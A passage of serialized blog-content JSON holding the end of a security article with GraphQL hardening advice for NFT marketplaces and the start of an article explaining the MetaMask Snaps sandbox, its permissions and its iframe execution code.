",{"type":26,"tag":41,"props":37834,"children":37837},{"href":37835,"rel":37836},"https://graphql.org/",[45],[37838],{"type":32,"value":37839},"GraphQl",{"type":32,"value":37841}," is widely utilized by NFT marketplaces, it is crucial to understand the reasons behind disabling certain features like ",{"type":26,"tag":41,"props":37843,"children":37846},{"href":37844,"rel":37845},"https://graphql.org/learn/introspection/",[45],[37847],{"type":32,"value":37848},"introspection",{"type":32,"value":37850}," in production environments. By disabling introspection, it ensures that clients are unable to query the API's schema, preventing the potential exposure of sensitive information regarding its structure and implementation. Below, we provide an example of how to achieve this using the Apollo server:",{"type":26,"tag":5512,"props":37852,"children":37854},{"className":33958,"code":37853,"language":33960,"meta":7,"style":7},"const server = new ApolloServer({\n  typeDefs,\n  resolvers,\n  introspection: false,\n});\n",[37855],{"type":26,"tag":130,"props":37856,"children":37857},{"__ignoreMap":7},[37858,37887,37899,37911,37927],{"type":26,"tag":137,"props":37859,"children":37860},{"class":5559,"line":5560},[37861,37865,37870,37874,37878,37883],{"type":26,"tag":137,"props":37862,"children":37863},{"style":5573},[37864],{"type":32,"value":12244},{"type":26,"tag":137,"props":37866,"children":37867},{"style":5584},[37868],{"type":32,"value":37869}," server",{"type":26,"tag":137,"props":37871,"children":37872},{"style":5590},[37873],{"type":32,"value":5593},{"type":26,"tag":137,"props":37875,"children":37876},{"style":5573},[37877],{"type":32,"value":34528},{"type":26,"tag":137,"props":37879,"children":37880},{"style":5682},[37881],{"type":32,"value":37882}," ApolloServer",{"type":26,"tag":137,"props":37884,"children":37885},{"style":5601},[37886],{"type":32,"value":17732},{"type":26,"tag":137,"props":37888,"children":37889},{"class":5559,"line":5412},[37890,37895],{"type":26,"tag":137,"props":37891,"children":37892},{"style":5584},[37893],{"type":32,"value":37894},"  typeDefs",{"type":26,"tag":137,"props":37896,"children":37897},{"style":5601},[37898],{"type":32,"value":6099},{"type":26,"tag":137,"props":37900,"children":37901},{"class":5559,"line":5417},[37902,37907],{"type":26,"tag":137,"props":37903,"children":37904},{"style":5584},[37905],{"type":32,"value":37906},"  resolvers",{"type":26,"tag":137,"props":37908,"children":37909},{"style":5601},[37910],{"type":32,"value":6099},{"type":26,"tag":137,"props":37912,"children":37913},{"class":5559,"line":5642},[37914,37919,37923],{"type":26,"tag":137,"props":37915,"children":37916},{"style":5584},[37917],{"type":32,"value":37918},"  introspection:",{"type":26,"tag":137,"props":37920,"children":37921},{"style":5573},[37922],{"type":32,"value":11645},{"type":26,"tag":137,"props":37924,"children":37925},{"style":5601},[37926],{"type":32,"value":6099},{"type":26,"tag":137,"props":37928,"children":37929},{"class":5559,"line":5745},[37930],{"type":26,"tag":137,"props":37931,"children":37932},{"style":5601},[37933],{"type":32,"value":37934},"});\n",{"type":26,"tag":35,"props":37936,"children":37937},{},[37938,37940,37947,37949,37956],{"type":32,"value":37939},"Similarly, when ",{"type":26,"tag":41,"props":37941,"children":37944},{"href":37942,"rel":37943},"https://www.apollographql.com/blog/apollo-client/performance/batching-client-graphql-queries/",[45],[37945],{"type":32,"value":37946},"batching",{"type":32,"value":37948}," is enabled, the code should limit the number of queries that can run simultaneously and implement object request rate limiting. This additional measure helps protect the website from potential ",{"type":26,"tag":41,"props":37950,"children":37953},{"href":37951,"rel":37952},"https://en.wikipedia.org/wiki/Denial-of-service_attack",[45],[37954],{"type":32,"value":37955},"denial-of-service",{"type":32,"value":37957}," (DoS) attacks.",{"type":26,"tag":35,"props":37959,"children":37960},{},[37961],{"type":32,"value":37962},"Lastly, NFT marketplaces should pay close attention to authentication and authorization controls. Specifically, addressing third-party platform misconfiguration. Applying the least privilege principle is crucial for enhancing security.",{"type":26,"tag":35,"props":37964,"children":37965},{},[37966],{"type":32,"value":37967},"By implementing these security measures, NFT marketplaces can strengthen their security posture, build trust among users, and create a secure environment for the trading and exchange of valuable digital assets.",{"type":26,"tag":27,"props":37969,"children":37970},{"id":31526},[37971],{"type":32,"value":21540},{"type":26,"tag":35,"props":37973,"children":37974},{},[37975],{"type":32,"value":37976},"To recap, the presence of Web 2 bugs in NFT marketplaces emphasizes the need to address the underlying security issues within these platforms. Developers must prioritize not only the integrity of on-chain operations, but also the security of off-chain processes. To ensure an overall robust and trustworthy ecosystem for NFT marketplaces, developers should focus on implementing comprehensive security measures across all the components of the marketplace, engage with third party auditor, and test the entire infrastructure as necessary to identify and address any potential vulnerabilities.",{"type":26,"tag":35,"props":37978,"children":37979},{},[37980],{"type":32,"value":37981},"Most of all, it is especially crucial to educate communities about risks and security best practices. By promoting awareness and providing transparent information, platforms can empower users to make informed decisions and protect themselves against potential scams or fraudulent activities.",{"type":26,"tag":92,"props":37983,"children":37985},{"id":37984},"disclaimer",[37986],{"type":32,"value":37987},"Disclaimer",{"type":26,"tag":35,"props":37989,"children":37990},{},[37991],{"type":32,"value":37992},"Despite our consistent efforts to contact the Rocki Marketplace team regarding our findings, we unfortunately have not received a response. As a result, we decided to disclose this matter to our readers. We will continue to closely monitor the situation and remain open in helping their team resolve this issue.",{"type":26,"tag":7949,"props":37994,"children":37995},{},[37996],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":37998},[37999,38002,38008,38012,38013],{"id":31609,"depth":5412,"text":31612,"children":38000},[38001],{"id":5488,"depth":5417,"text":5491},{"id":33802,"depth":5412,"text":33832,"children":38003},[38004,38005,38006,38007],{"id":33851,"depth":5417,"text":33854},{"id":33916,"depth":5417,"text":33919},{"id":36747,"depth":5417,"text":36750},{"id":37037,"depth":5417,"text":37040},{"id":37382,"depth":5412,"text":37385,"children":38009},[38010,38011],{"id":37404,"depth":5417,"text":37407},{"id":37454,"depth":5417,"text":37457},{"id":37538,"depth":5412,"text":37544},{"id":37984,"depth":5412,"text":37987},"content:blog:2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions.md","blog/2023-08-11-web2-bug-repellant-instructions",{"_path":38018,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":38019,"description":38020,"author":38021,"image":38022,"date":38024,"isFeatured":18,"onBlogPage":18,"body":38025,"_type":5433,"_id":43041,"_source":5435,"_file":43042,"_stem":43043,"_extension":5438},"/blog/2023-11-01-metamask-snaps","Metamask Snaps: Playing in the Sand","A deep dig into Metamask Snaps. We explore safety considerations, environment design, and break down a property spoofing vulnerability in the Snaps sandboxing layer.",[33796,33795],{"src":38023,"height":16214,"width":17},"/posts/metamask-snaps/header.png","2023-11-01",{"type":23,"children":38026,"toc":43022},[38027,38031,38036,38041,38046,38052,38057,38063,38076,38081,38086,38093,38125,38131,38136,38154,38161,38167,38181,38187,38207,38471,38499,38505,38524,38910,38929,38942,39260,39281,39552,39557,39563,39568,39581,39586,39599,39858,39902,39915,39921,39935,39941,39947,39960,39997,40003,40023,40134,40161,40167,40185,40198,40204,40209,40227,40338,40343,40364,40377,40394,40494,40520,40537,40659,40685,40697,40702,40708,40714,40719,40742,40747,40752,40758,40764,40791,41194,41221,41248,41254,41285,41594,41613,41618,41643,41656,41662,41689,41984,42020,42038,42043,42078,42083,42087,42092,42099,42104,42131,42908,42928,42934,42955,43004,43008,43013,43018],{"type":26,"tag":92,"props":38028,"children":38029},{"id":21549},[38030],{"type":32,"value":21552},{"type":26,"tag":35,"props":38032,"children":38033},{},[38034],{"type":32,"value":38035},"Metamask snaps are simple modules that extend Metamask's functionality. These modules can be written by anyone, and provide useful features that the vanilla wallet doesn't.",{"type":26,"tag":35,"props":38037,"children":38038},{},[38039],{"type":32,"value":38040},"Metamask provides a sandboxed environment that allows developers to run Snap code safely, without disclosing or tampering with critical information without user permission.",{"type":26,"tag":35,"props":38042,"children":38043},{},[38044],{"type":32,"value":38045},"In this article, we'll explore exactly how the snap execution environment works. We'll then delve into a unique property spoofing vulnerability we reported in the Metamask Snaps sandbox.",{"type":26,"tag":92,"props":38047,"children":38049},{"id":38048},"sandbox-security",[38050],{"type":32,"value":38051},"Sandbox Security",{"type":26,"tag":35,"props":38053,"children":38054},{},[38055],{"type":32,"value":38056},"In the first part of the article, we'll describe how the Metamask sandbox works, and examine what it's doing to protect the security of Snaps.",{"type":26,"tag":118,"props":38058,"children":38060},{"id":38059},"permission-based-security",[38061],{"type":32,"value":38062},"Permission-based security",{"type":26,"tag":35,"props":38064,"children":38065},{},[38066,38068,38074],{"type":32,"value":38067},"Each snap is built to have only the permissions it needs to hold. These permissions are specified in the ",{"type":26,"tag":130,"props":38069,"children":38071},{"className":38070},[],[38072],{"type":32,"value":38073},"snap.manifest.json",{"type":32,"value":38075}," file and can be critical to security.",{"type":26,"tag":35,"props":38077,"children":38078},{},[38079],{"type":32,"value":38080},"Snap security is totally centered around the user, whose decisions can provide dangerous permissions to a malicious snap. Metamask warns about the risk of each permission.",{"type":26,"tag":35,"props":38082,"children":38083},{},[38084],{"type":32,"value":38085},"Here are the critical permissions possible to be given to a snap:",{"type":26,"tag":35,"props":38087,"children":38088},{},[38089],{"type":26,"tag":2210,"props":38090,"children":38092},{"alt":7,"src":38091},"/posts/metamask-snaps/permissions.png",[],{"type":26,"tag":3426,"props":38094,"children":38095},{},[38096,38114],{"type":26,"tag":3430,"props":38097,"children":38098},{},[38099,38105,38106,38112],{"type":26,"tag":130,"props":38100,"children":38102},{"className":38101},[],[38103],{"type":32,"value":38104},"snap_getBip44Entropy",{"type":32,"value":3339},{"type":26,"tag":130,"props":38107,"children":38109},{"className":38108},[],[38110],{"type":32,"value":38111},"snap_getBip32Entropy",{"type":32,"value":38113}," -> a malicious snap retrieving keypair leads to loss of funds",{"type":26,"tag":3430,"props":38115,"children":38116},{},[38117,38123],{"type":26,"tag":130,"props":38118,"children":38120},{"className":38119},[],[38121],{"type":32,"value":38122},"endowment:transaction-insight",{"type":32,"value":38124}," -> a malicious snap getting insights of a transaction before approval can lead to frontrunning attacks",{"type":26,"tag":118,"props":38126,"children":38128},{"id":38127},"snap-execution-environment",[38129],{"type":32,"value":38130},"Snap execution environment",{"type":26,"tag":35,"props":38132,"children":38133},{},[38134],{"type":32,"value":38135},"Snaps are executed in a totally sandboxed environment which provides a safe context for executing untrusted code, and separates it from the normal execution flow. To accomplish this, Metamask uses 3 layers of security to create this safe environment:",{"type":26,"tag":4820,"props":38137,"children":38138},{},[38139,38144,38149],{"type":26,"tag":3430,"props":38140,"children":38141},{},[38142],{"type":32,"value":38143},"An isolated iframe",{"type":26,"tag":3430,"props":38145,"children":38146},{},[38147],{"type":32,"value":38148},"LavaMoat",{"type":26,"tag":3430,"props":38150,"children":38151},{},[38152],{"type":32,"value":38153},"SES (Secure EcmaScript)",{"type":26,"tag":35,"props":38155,"children":38156},{},[38157],{"type":26,"tag":2210,"props":38158,"children":38160},{"alt":7,"src":38159},"/posts/metamask-snaps/environment.png",[],{"type":26,"tag":118,"props":38162,"children":38164},{"id":38163},"isolated-iframe-layer-1",[38165],{"type":32,"value":38166},"Isolated Iframe - Layer 1",{"type":26,"tag":35,"props":38168,"children":38169},{},[38170,38172,38179],{"type":32,"value":38171},"Snaps empower developers to enhance Metamask's functionality while maintaining a strong security posture. These modules execute within an ",{"type":26,"tag":41,"props":38173,"children":38176},{"href":38174,"rel":38175},"https://blog.logrocket.com/the-ultimate-guide-to-iframes/",[45],[38177],{"type":32,"value":38178},"Iframe",{"type":32,"value":38180}," environment, ensuring they are isolated and secure. To facilitate this execution, Metamask takes advantage of an iFrame sandboxing mechanism, allowing snaps to operate in a contained context.",{"type":26,"tag":21485,"props":38182,"children":38184},{"id":38183},"the-framework-metamask-extension-repo",[38185],{"type":32,"value":38186},"The Framework: Metamask-Extension Repo",{"type":26,"tag":35,"props":38188,"children":38189},{},[38190,38192,38198,38200,38206],{"type":32,"value":38191},"The process of snap execution kicks off within the metamask-extension repository's ",{"type":26,"tag":130,"props":38193,"children":38195},{"className":38194},[],[38196],{"type":32,"value":38197},"metamask-controller.js",{"type":32,"value":38199}," file. Here's a glimpse of the relevant ",{"type":26,"tag":41,"props":38201,"children":38204},{"href":38202,"rel":38203},"https://github.com/MetaMask/metamask-extension/blob/4b23ea8c95bea9ea12336537bb6bda4568a99098/app/scripts/metamask-controller.js#L978",[45],[38205],{"type":32,"value":130},{"type":32,"value":7072},{"type":26,"tag":5512,"props":38208,"children":38212},{"className":38209,"code":38210,"language":38211,"meta":7,"style":7},"language-javascript shiki shiki-themes slack-dark","// Import snaps-controllers\n// ...\nconst snapExecutionServiceArgs = {\n  iframeUrl: new URL(process.env.IFRAME_EXECUTION_ENVIRONMENT_URL),\n  messenger: this.controllerMessenger.getRestricted({\n    name: 'ExecutionService',\n  }),\n  setupSnapProvider: this.setupSnapProvider.bind(this),\n};\n\n// Define IFRAME_EXECUTION_ENVIRONMENT_URL\nprocess.env.IFRAME_EXECUTION_ENVIRONMENT_URL =\n  'https://execution.metamask.io/0.36.1-flask.1/index.html';\n// ...\n","javascript",[38213],{"type":26,"tag":130,"props":38214,"children":38215},{"__ignoreMap":7},[38216,38224,38232,38252,38300,38335,38352,38360,38402,38409,38416,38424,38452,38464],{"type":26,"tag":137,"props":38217,"children":38218},{"class":5559,"line":5560},[38219],{"type":26,"tag":137,"props":38220,"children":38221},{"style":5564},[38222],{"type":32,"value":38223},"// Import snaps-controllers\n",{"type":26,"tag":137,"props":38225,"children":38226},{"class":5559,"line":5412},[38227],{"type":26,"tag":137,"props":38228,"children":38229},{"style":5564},[38230],{"type":32,"value":38231},"// ...\n",{"type":26,"tag":137,"props":38233,"children":38234},{"class":5559,"line":5417},[38235,38239,38244,38248],{"type":26,"tag":137,"props":38236,"children":38237},{"style":5573},[38238],{"type":32,"value":12244},{"type":26,"tag":137,"props":38240,"children":38241},{"style":5584},[38242],{"type":32,"value":38243}," snapExecutionServiceArgs",{"type":26,"tag":137,"props":38245,"children":38246},{"style":5590},[38247],{"type":32,"value":5593},{"type":26,"tag":137,"props":38249,"children":38250},{"style":5601},[38251],{"type":32,"value":5875},{"type":26,"tag":137,"props":38253,"children":38254},{"class":5559,"line":5642},[38255,38260,38264,38269,38273,38278,38282,38287,38291,38296],{"type":26,"tag":137,"props":38256,"children":38257},{"style":5584},[38258],{"type":32,"value":38259},"  iframeUrl:",{"type":26,"tag":137,"props":38261,"children":38262},{"style":5573},[38263],{"type":32,"value":34528},{"type":26,"tag":137,"props":38265,"children":38266},{"style":5682},[38267],{"type":32,"value":38268}," URL",{"type":26,"tag":137,"props":38270,"children":38271},{"style":5601},[38272],{"type":32,"value":165},{"type":26,"tag":137,"props":38274,"children":38275},{"style":5584},[38276],{"type":32,"value":38277},"process",{"type":26,"tag":137,"props":38279,"children":38280},{"style":5601},[38281],{"type":32,"value":470},{"type":26,"tag":137,"props":38283,"children":38284},{"style":5584},[38285],{"type":32,"value":38286},"env",{"type":26,"tag":137,"props":38288,"children":38289},{"style":5601},[38290],{"type":32,"value":470},{"type":26,"tag":137,"props":38292,"children":38293},{"style":5584},[38294],{"type":32,"value":38295},"IFRAME_EXECUTION_ENVIRONMENT_URL",{"type":26,"tag":137,"props":38297,"children":38298},{"style":5601},[38299],{"type":32,"value":9320},{"type":26,"tag":137,"props":38301,"children":38302},{"class":5559,"line":5745},[38303,38308,38313,38317,38322,38326,38331],{"type":26,"tag":137,"props":38304,"children":38305},{"style":5584},[38306],{"type":32,"value":38307},"  messenger:",{"type":26,"tag":137,"props":38309,"children":38310},{"style":5573},[38311],{"type":32,"value":38312}," this",{"type":26,"tag":137,"props":38314,"children":38315},{"style":5601},[38316],{"type":32,"value":470},{"type":26,"tag":137,"props":38318,"children":38319},{"style":5584},[38320],{"type":32,"value":38321},"controllerMessenger",{"type":26,"tag":137,"props":38323,"children":38324},{"style":5601},[38325],{"type":32,"value":470},{"type":26,"tag":137,"props":38327,"children":38328},{"style":5682},[38329],{"type":32,"value":38330},"getRestricted",{"type":26,"tag":137,"props":38332,"children":38333},{"style":5601},[38334],{"type":32,"value":17732},{"type":26,"tag":137,"props":38336,"children":38337},{"class":5559,"line":5850},[38338,38343,38348],{"type":26,"tag":137,"props":38339,"children":38340},{"style":5584},[38341],{"type":32,"value":38342},"    name:",{"type":26,"tag":137,"props":38344,"children":38345},{"style":6837},[38346],{"type":32,"value":38347}," 'ExecutionService'",{"type":26,"tag":137,"props":38349,"children":38350},{"style":5601},[38351],{"type":32,"value":6099},{"type":26,"tag":137,"props":38353,"children":38354},{"class":5559,"line":5878},[38355],{"type":26,"tag":137,"props":38356,"children":38357},{"style":5601},[38358],{"type":32,"value":38359},"  }),\n",{"type":26,"tag":137,"props":38361,"children":38362},{"class":5559,"line":5891},[38363,38368,38372,38376,38381,38385,38390,38394,38398],{"type":26,"tag":137,"props":38364,"children":38365},{"style":5584},[38366],{"type":32,"value":38367},"  setupSnapProvider:",{"type":26,"tag":137,"props":38369,"children":38370},{"style":5573},[38371],{"type":32,"value":38312},{"type":26,"tag":137,"props":38373,"children":38374},{"style":5601},[38375],{"type":32,"value":470},{"type":26,"tag":137,"props":38377,"children":38378},{"style":5584},[38379],{"type":32,"value":38380},"setupSnapProvider",{"type":26,"tag":137,"props":38382,"children":38383},{"style":5601},[38384],{"type":32,"value":470},{"type":26,"tag":137,"props":38386,"children":38387},{"style":5682},[38388],{"type":32,"value":38389},"bind",{"type":26,"tag":137,"props":38391,"children":38392},{"style":5601},[38393],{"type":32,"value":165},{"type":26,"tag":137,"props":38395,"children":38396},{"style":5573},[38397],{"type":32,"value":20285},{"type":26,"tag":137,"props":38399,"children":38400},{"style":5601},[38401],{"type":32,"value":9320},{"type":26,"tag":137,"props":38403,"children":38404},{"class":5559,"line":5909},[38405],{"type":26,"tag":137,"props":38406,"children":38407},{"style":5601},[38408],{"type":32,"value":19170},{"type":26,"tag":137,"props":38410,"children":38411},{"class":5559,"line":5930},[38412],{"type":26,"tag":137,"props":38413,"children":38414},{"emptyLinePlaceholder":18},[38415],{"type":32,"value":6276},{"type":26,"tag":137,"props":38417,"children":38418},{"class":5559,"line":5939},[38419],{"type":26,"tag":137,"props":38420,"children":38421},{"style":5564},[38422],{"type":32,"value":38423},"// Define IFRAME_EXECUTION_ENVIRONMENT_URL\n",{"type":26,"tag":137,"props":38425,"children":38426},{"class":5559,"line":6191},[38427,38431,38435,38439,38443,38447],{"type":26,"tag":137,"props":38428,"children":38429},{"style":5584},[38430],{"type":32,"value":38277},{"type":26,"tag":137,"props":38432,"children":38433},{"style":5601},[38434],{"type":32,"value":470},{"type":26,"tag":137,"props":38436,"children":38437},{"style":5584},[38438],{"type":32,"value":38286},{"type":26,"tag":137,"props":38440,"children":38441},{"style":5601},[38442],{"type":32,"value":470},{"type":26,"tag":137,"props":38444,"children":38445},{"style":5584},[38446],{"type":32,"value":38295},{"type":26,"tag":137,"props":38448,"children":38449},{"style":5590},[38450],{"type":32,"value":38451}," =\n",{"type":26,"tag":137,"props":38453,"children":38454},{"class":5559,"line":6208},[38455,38460],{"type":26,"tag":137,"props":38456,"children":38457},{"style":6837},[38458],{"type":32,"value":38459},"  'https://execution.metamask.io/0.36.1-flask.1/index.html'",{"type":26,"tag":137,"props":38461,"children":38462},{"style":5601},[38463],{"type":32,"value":5604},{"type":26,"tag":137,"props":38465,"children":38466},{"class":5559,"line":6225},[38467],{"type":26,"tag":137,"props":38468,"children":38469},{"style":5564},[38470],{"type":32,"value":38231},{"type":26,"tag":35,"props":38472,"children":38473},{},[38474,38476,38482,38484,38490,38492,38497],{"type":32,"value":38475},"This code is defining the ",{"type":26,"tag":130,"props":38477,"children":38479},{"className":38478},[],[38480],{"type":32,"value":38481},"snapExecutionServiceArgs",{"type":32,"value":38483}," object, which contains information required for the ",{"type":26,"tag":130,"props":38485,"children":38487},{"className":38486},[],[38488],{"type":32,"value":38489},"IframeExecutionService",{"type":32,"value":38491}," to execute snaps. The ",{"type":26,"tag":130,"props":38493,"children":38495},{"className":38494},[],[38496],{"type":32,"value":38295},{"type":32,"value":38498}," points to the location where the execution environment resides.",{"type":26,"tag":21485,"props":38500,"children":38502},{"id":38501},"executing-snaps-iframeexecutionservice-in-action",[38503],{"type":32,"value":38504},"Executing Snaps: IframeExecutionService in Action",{"type":26,"tag":35,"props":38506,"children":38507},{},[38508,38510,38515,38517,38523],{"type":32,"value":38509},"Inside the snaps-controller package's IframeExecutionService.ts file, the ",{"type":26,"tag":130,"props":38511,"children":38513},{"className":38512},[],[38514],{"type":32,"value":38489},{"type":32,"value":38516}," orchestrates snap execution. Again, here's a snippet of the relevant ",{"type":26,"tag":41,"props":38518,"children":38521},{"href":38519,"rel":38520},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/AbstractExecutionService.ts#L89",[45],[38522],{"type":32,"value":130},{"type":32,"value":7072},{"type":26,"tag":5512,"props":38525,"children":38529},{"className":38526,"code":38527,"language":38528,"meta":7,"style":7},"language-typescript shiki shiki-themes slack-dark","// Register message handlers for snap interactions\nthis.#messenger.registerActionHandler(\n  `${controllerName}:handleRpcRequest`,\n  async (snapId: string, options: SnapRpcHookArgs) =>\n    this.handleRpcRequest(snapId, options),\n);\n\n// More handlers for executeSnap, terminateSnap, etc.\n// ...\n\n// Execute a snap\nasync executeSnap(snapData: SnapExecutionData) {\n  // Initialize job, streams, and environment\n  const { jobId } = await this.initJob(snapData);\n  const { worker, stream } = await this.initEnvStream(jobId);\n  // ...\n}\n","typescript",[38530],{"type":26,"tag":130,"props":38531,"children":38532},{"__ignoreMap":7},[38533,38541,38570,38600,38653,38690,38697,38704,38712,38719,38726,38734,38769,38777,38833,38895,38903],{"type":26,"tag":137,"props":38534,"children":38535},{"class":5559,"line":5560},[38536],{"type":26,"tag":137,"props":38537,"children":38538},{"style":5564},[38539],{"type":32,"value":38540},"// Register message handlers for snap interactions\n",{"type":26,"tag":137,"props":38542,"children":38543},{"class":5559,"line":5412},[38544,38548,38552,38557,38561,38566],{"type":26,"tag":137,"props":38545,"children":38546},{"style":5573},[38547],{"type":32,"value":20285},{"type":26,"tag":137,"props":38549,"children":38550},{"style":5601},[38551],{"type":32,"value":470},{"type":26,"tag":137,"props":38553,"children":38554},{"style":5584},[38555],{"type":32,"value":38556},"#messenger",{"type":26,"tag":137,"props":38558,"children":38559},{"style":5601},[38560],{"type":32,"value":470},{"type":26,"tag":137,"props":38562,"children":38563},{"style":5682},[38564],{"type":32,"value":38565},"registerActionHandler",{"type":26,"tag":137,"props":38567,"children":38568},{"style":5601},[38569],{"type":32,"value":6054},{"type":26,"tag":137,"props":38571,"children":38572},{"class":5559,"line":5417},[38573,38578,38582,38587,38591,38596],{"type":26,"tag":137,"props":38574,"children":38575},{"style":6837},[38576],{"type":32,"value":38577},"  `",{"type":26,"tag":137,"props":38579,"children":38580},{"style":5573},[38581],{"type":32,"value":36704},{"type":26,"tag":137,"props":38583,"children":38584},{"style":5584},[38585],{"type":32,"value":38586},"controllerName",{"type":26,"tag":137,"props":38588,"children":38589},{"style":5573},[38590],{"type":32,"value":36736},{"type":26,"tag":137,"props":38592,"children":38593},{"style":6837},[38594],{"type":32,"value":38595},":handleRpcRequest`",{"type":26,"tag":137,"props":38597,"children":38598},{"style":5601},[38599],{"type":32,"value":6099},{"type":26,"tag":137,"props":38601,"children":38602},{"class":5559,"line":5642},[38603,38608,38612,38617,38621,38626,38630,38635,38639,38644,38648],{"type":26,"tag":137,"props":38604,"children":38605},{"style":5573},[38606],{"type":32,"value":38607},"  async",{"type":26,"tag":137,"props":38609,"children":38610},{"style":5601},[38611],{"type":32,"value":4625},{"type":26,"tag":137,"props":38613,"children":38614},{"style":5584},[38615],{"type":32,"value":38616},"snapId",{"type":26,"tag":137,"props":38618,"children":38619},{"style":5590},[38620],{"type":32,"value":7072},{"type":26,"tag":137,"props":38622,"children":38623},{"style":6009},[38624],{"type":32,"value":38625}," string",{"type":26,"tag":137,"props":38627,"children":38628},{"style":5601},[38629],{"type":32,"value":1108},{"type":26,"tag":137,"props":38631,"children":38632},{"style":5584},[38633],{"type":32,"value":38634},"options",{"type":26,"tag":137,"props":38636,"children":38637},{"style":5590},[38638],{"type":32,"value":7072},{"type":26,"tag":137,"props":38640,"children":38641},{"style":6009},[38642],{"type":32,"value":38643}," SnapRpcHookArgs",{"type":26,"tag":137,"props":38645,"children":38646},{"style":5601},[38647],{"type":32,"value":5671},{"type":26,"tag":137,"props":38649,"children":38650},{"style":5573},[38651],{"type":32,"value":38652},"=>\n",{"type":26,"tag":137,"props":38654,"children":38655},{"class":5559,"line":5745},[38656,38661,38665,38670,38674,38678,38682,38686],{"type":26,"tag":137,"props":38657,"children":38658},{"style":5573},[38659],{"type":32,"value":38660},"    this",{"type":26,"tag":137,"props":38662,"children":38663},{"style":5601},[38664],{"type":32,"value":470},{"type":26,"tag":137,"props":38666,"children":38667},{"style":5682},[38668],{"type":32,"value":38669},"handleRpcRequest",{"type":26,"tag":137,"props":38671,"children":38672},{"style":5601},[38673],{"type":32,"value":165},{"type":26,"tag":137,"props":38675,"children":38676},{"style":5584},[38677],{"type":32,"value":38616},{"type":26,"tag":137,"props":38679,"children":38680},{"style":5601},[38681],{"type":32,"value":1108},{"type":26,"tag":137,"props":38683,"children":38684},{"style":5584},[38685],{"type":32,"value":38634},{"type":26,"tag":137,"props":38687,"children":38688},{"style":5601},[38689],{"type":32,"value":9320},{"type":26,"tag":137,"props":38691,"children":38692},{"class":5559,"line":5850},[38693],{"type":26,"tag":137,"props":38694,"children":38695},{"style":5601},[38696],{"type":32,"value":6430},{"type":26,"tag":137,"props":38698,"children":38699},{"class":5559,"line":5878},[38700],{"type":26,"tag":137,"props":38701,"children":38702},{"emptyLinePlaceholder":18},[38703],{"type":32,"value":6276},{"type":26,"tag":137,"props":38705,"children":38706},{"class":5559,"line":5891},[38707],{"type":26,"tag":137,"props":38708,"children":38709},{"style":5564},[38710],{"type":32,"value":38711},"// More handlers for executeSnap, terminateSnap, etc.\n",{"type":26,"tag":137,"props":38713,"children":38714},{"class":5559,"line":5909},[38715],{"type":26,"tag":137,"props":38716,"children":38717},{"style":5564},[38718],{"type":32,"value":38231},{"type":26,"tag":137,"props":38720,"children":38721},{"class":5559,"line":5930},[38722],{"type":26,"tag":137,"props":38723,"children":38724},{"emptyLinePlaceholder":18},[38725],{"type":32,"value":6276},{"type":26,"tag":137,"props":38727,"children":38728},{"class":5559,"line":5939},[38729],{"type":26,"tag":137,"props":38730,"children":38731},{"style":5564},[38732],{"type":32,"value":38733},"// Execute a snap\n",{"type":26,"tag":137,"props":38735,"children":38736},{"class":5559,"line":6191},[38737,38742,38747,38751,38756,38760,38765],{"type":26,"tag":137,"props":38738,"children":38739},{"style":5584},[38740],{"type":32,"value":38741},"async",{"type":26,"tag":137,"props":38743,"children":38744},{"style":5682},[38745],{"type":32,"value":38746}," executeSnap",{"type":26,"tag":137,"props":38748,"children":38749},{"style":5601},[38750],{"type":32,"value":165},{"type":26,"tag":137,"props":38752,"children":38753},{"style":5584},[38754],{"type":32,"value":38755},"snapData",{"type":26,"tag":137,"props":38757,"children":38758},{"style":5601},[38759],{"type":32,"value":17923},{"type":26,"tag":137,"props":38761,"children":38762},{"style":5584},[38763],{"type":32,"value":38764},"SnapExecutionData",{"type":26,"tag":137,"props":38766,"children":38767},{"style":5601},[38768],{"type":32,"value":17395},{"type":26,"tag":137,"props":38770,"children":38771},{"class":5559,"line":6208},[38772],{"type":26,"tag":137,"props":38773,"children":38774},{"style":5564},[38775],{"type":32,"value":38776},"  // Initialize job, streams, and environment\n",{"type":26,"tag":137,"props":38778,"children":38779},{"class":5559,"line":6225},[38780,38785,38789,38794,38799,38803,38808,38812,38816,38821,38825,38829],{"type":26,"tag":137,"props":38781,"children":38782},{"style":5573},[38783],{"type":32,"value":38784},"  const",{"type":26,"tag":137,"props":38786,"children":38787},{"style":5601},[38788],{"type":32,"value":12175},{"type":26,"tag":137,"props":38790,"children":38791},{"style":5584},[38792],{"type":32,"value":38793},"jobId",{"type":26,"tag":137,"props":38795,"children":38796},{"style":5601},[38797],{"type":32,"value":38798}," } ",{"type":26,"tag":137,"props":38800,"children":38801},{"style":5590},[38802],{"type":32,"value":289},{"type":26,"tag":137,"props":38804,"children":38805},{"style":5610},[38806],{"type":32,"value":38807}," await",{"type":26,"tag":137,"props":38809,"children":38810},{"style":5573},[38811],{"type":32,"value":38312},{"type":26,"tag":137,"props":38813,"children":38814},{"style":5601},[38815],{"type":32,"value":470},{"type":26,"tag":137,"props":38817,"children":38818},{"style":5682},[38819],{"type":32,"value":38820},"initJob",{"type":26,"tag":137,"props":38822,"children":38823},{"style":5601},[38824],{"type":32,"value":165},{"type":26,"tag":137,"props":38826,"children":38827},{"style":5584},[38828],{"type":32,"value":38755},{"type":26,"tag":137,"props":38830,"children":38831},{"style":5601},[38832],{"type":32,"value":6430},{"type":26,"tag":137,"props":38834,"children":38835},{"class":5559,"line":6238},[38836,38840,38844,38849,38853,38858,38862,38866,38870,38874,38878,38883,38887,38891],{"type":26,"tag":137,"props":38837,"children":38838},{"style":5573},[38839],{"type":32,"value":38784},{"type":26,"tag":137,"props":38841,"children":38842},{"style":5601},[38843],{"type":32,"value":12175},{"type":26,"tag":137,"props":38845,"children":38846},{"style":5584},[38847],{"type":32,"value":38848},"worker",{"type":26,"tag":137,"props":38850,"children":38851},{"style":5601},[38852],{"type":32,"value":1108},{"type":26,"tag":137,"props":38854,"children":38855},{"style":5584},[38856],{"type":32,"value":38857},"stream",{"type":26,"tag":137,"props":38859,"children":38860},{"style":5601},[38861],{"type":32,"value":38798},{"type":26,"tag":137,"props":38863,"children":38864},{"style":5590},[38865],{"type":32,"value":289},{"type":26,"tag":137,"props":38867,"children":38868},{"style":5610},[38869],{"type":32,"value":38807},{"type":26,"tag":137,"props":38871,"children":38872},{"style":5573},[38873],{"type":32,"